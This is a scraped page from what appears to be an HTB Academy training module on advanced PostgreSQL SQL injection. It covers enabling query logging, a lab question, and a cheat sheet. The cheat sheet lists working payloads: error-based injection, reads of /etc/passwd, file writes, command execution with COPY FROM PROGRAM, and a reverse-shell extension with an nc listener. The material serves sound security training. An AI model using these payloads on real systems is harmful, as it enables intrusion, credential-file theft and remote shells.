Advanced SQL Injections

Hunting for SQL Errors

Enabling PostgreSQL Logging

Another way to identify the SQL queries which are run, as well as debug your payloads when developing an exploit is to enable SQL logging.

To do so in PostgreSQL, we first need to find postgresql.conf. Usually it is located in /etc/postgresql/<version>/main/, but if you can't find it there you can run:

[!bash!]$ find / -type f -name postgresql.conf 2>/dev/null
/etc/postgresql/13/main/postgresql.conf

Once we've located the file, we have to make the following changes to the file:

Change #logging_collector = off to logging_collector = on. This enables the logging collector background process [source].
#log_statement = 'none' to log_statement = 'all'. This makes it so all statement types (SELECT, CREATE, INSERT, ...) are logged [source].
Uncomment #log_directory = '...' to define the directory in which the logfiles will be saved [source].
Uncomment #log_filename = '...' to define the filename in which logfiles will be saved [source].

Once the changes have been saved, restart PostgreSQL like so:

[!bash!]$ sudo systemctl restart postgresql

At this point, the log file(s) should start appearing in the folder defined by log_directory. We can watch the log messages in near-realtime with the following command:

[!bash!]$ sudo watch -n 1 tail <log_directory>/postgresql-2023-02-14_081533.log
<SNIP>
2023-02-14 09:06:04.819 EST [22510] bbuser@bluebird LOG:  execute <unnamed>: SELECT * FROM users WHERE username = $1
2023-02-14 09:06:04.819 EST [22510] bbuser@bluebird DETAIL:  parameters: $1 = 'bmdyy'
2023-02-14 09:06:10.423 EST [22510] bbuser@bluebird LOG:  execute <unnamed>: SELECT * FROM users WHERE username = $1
2023-02-14 09:06:10.423 EST [22510] bbuser@bluebird DETAIL:  parameters: $1 = 'admin'
2023-02-14 09:06:12.999 EST [22510] bbuser@bluebird LOG:  execute <unnamed>: SELECT * FROM users WHERE username = $1
2023-02-14 09:06:12.999 EST [22510] bbuser@bluebird DETAIL:  parameters: $1 = 'test'
2023-02-14 09:06:16.688 EST [22510] bbuser@bluebird LOG:  execute <unnamed>: SELECT * FROM users WHERE username = $1
2023-02-14 09:06:16.688 EST [22510] bbuser@bluebird DETAIL:  parameters: $1 = 'itsmaria'

VPN Servers

Warning: Each time you "Switch", your connection keys are regenerated and you must re-download your VPN connection file.

All VM instances associated with the old VPN Server will be terminated when switching to a new VPN server.
Existing PwnBox instances will automatically switch to the new VPN server.

PROTOCOL

UDP 1337

TCP 443

/ 1 spawns left

Waiting to start...

Questions

Answer the question(s) below to complete this Section and earn cubes!

Target: Click here to spawn the target system!

Download VPN Connection File

SSH to with user "student" and password "academy.hackthebox.com"

+ 2 PostgreSQL logging has already been enabled on the testing VM. Check the log files and find the value 'application_name' is set to when BlueBird starts up.

+10 Streak pts

Previous Next

Go to Questions

Skills Assessment

My Workstation

OFFLINE

/ 1 spawns left

Cheat Sheet

The cheat sheet is a useful command reference for this module.

Interacting with PostgreSQL

psql -h <host> -U <username> <database>

Decompiling Java Archives

Fernflower

mkdir <OutputDirectory>
java -jar Fernflower.jar <Application>.jar <OutputDirectory>
cd <OutputDirectory>
jar -xf <Application>.jar

JD-GUI

jd-gui <Application>.jar

Regex Patterns for Finding SQLi Vulnerabilities

SELECT|UPDATE|DELETE|INSERT|CREATE|ALTER|DROP
(WHERE|VALUES).*?'
(WHERE|VALUES).*" +
.*sql.*"
jdbcTemplate

Live Debugging Java Applications

java -Xdebug -Xrunjdwp:transport=dt_socket,address=8000,server=y,suspend=y -jar <Application>.jar

Enabling PostgreSQL Logging

/etc/postgresql/13/main/postgresql.conf

Change #logging_collector = off to logging_collector = on
#log_statement = 'none' to log_statement = 'all'
Uncomment #log_directory = '...'
Uncomment #log_filename = '...'

Common Character Bypasses

Use /**/ instead of space
Use $$string$$ instead of 'string'

Error-Based SQL Injection

' and 0=CAST((SELECT VERSION()) AS INT)--
' and 1=CAST((SELECT table_name FROM information_schema.tables LIMIT 1) as INT)--
' and 1=CAST((SELECT STRING_AGG(table_name,',') FROM information_schema.tables LIMIT 1) as INT)--
';SELECT CAST(CAST(QUERY_TO_XML('SELECT ...',TRUE,TRUE,'') AS TEXT) AS INT)--

Reading and Writing Files

Reading with COPY

CREATE TABLE tmp (t TEXT);
COPY tmp FROM '/etc/passwd';
COPY tmp FROM '/etc/hosts' DELIMITER E'\x07';
SELECT * FROM tmp;
DROP TABLE tmp;

Reading with Large Objects

SELECT lo_import('/etc/passwd');
SELECT lo_get(16513);
SELECT data FROM pg_largeobject WHERE loid=16513 AND pageno=0;
echo 726f6f743<SNIP> | xxd -r -p

Writing with COPY

CREATE TABLE tmp (t TEXT);
INSERT INTO tmp VALUES ('To hack, or not to hack, that is the question');
COPY tmp TO '/tmp/proof.txt';
DROP TABLE tmp;

Writing with Large Objects

split -b 2048 /etc/passwd
xxd -ps -c 99999999999 xaa
SELECT lo_create(31337);
INSERT INTO pg_largeobject (loid, pageno, data) VALUES (31337, 0, DECODE('726f6f74<SNIP>6269','HEX'));
SELECT lo_export(31337, '/tmp/passwd');
SELECT lo_unlink(31337);

Command Execution

RCE with COPY

CREATE TABLE tmp(t TEXT);
COPY tmp FROM PROGRAM 'id';
SELECT * FROM tmp;
DROP TABLE tmp;

RCE with Extensions

sudo apt install postgresql-server-dev-13
gcc -I$(pg_config --includedir-server) -shared -fPIC -o pg_rev_shell.so pg_rev_shell.c
nc -nvlp 443

CREATE FUNCTION rev_shell(text, integer) RETURNS integer AS '/tmp/pg_rev_shell', 'rev_shell' LANGUAGE C STRICT;
SELECT rev_shell('127.0.0.1', 443);

Defending Against SQL Injection

Use parameterized queries!

Advanced SQL Injections

Hunting for SQL Errors

Enabling PostgreSQL Logging

Questions

Table of Contents

Introduction

Identifying Vulnerabilities

Advanced SQL Injection Techniques

PostgreSQL-Specific Techniques

Defending Against SQL Injection

Skills Assessment

My Workstation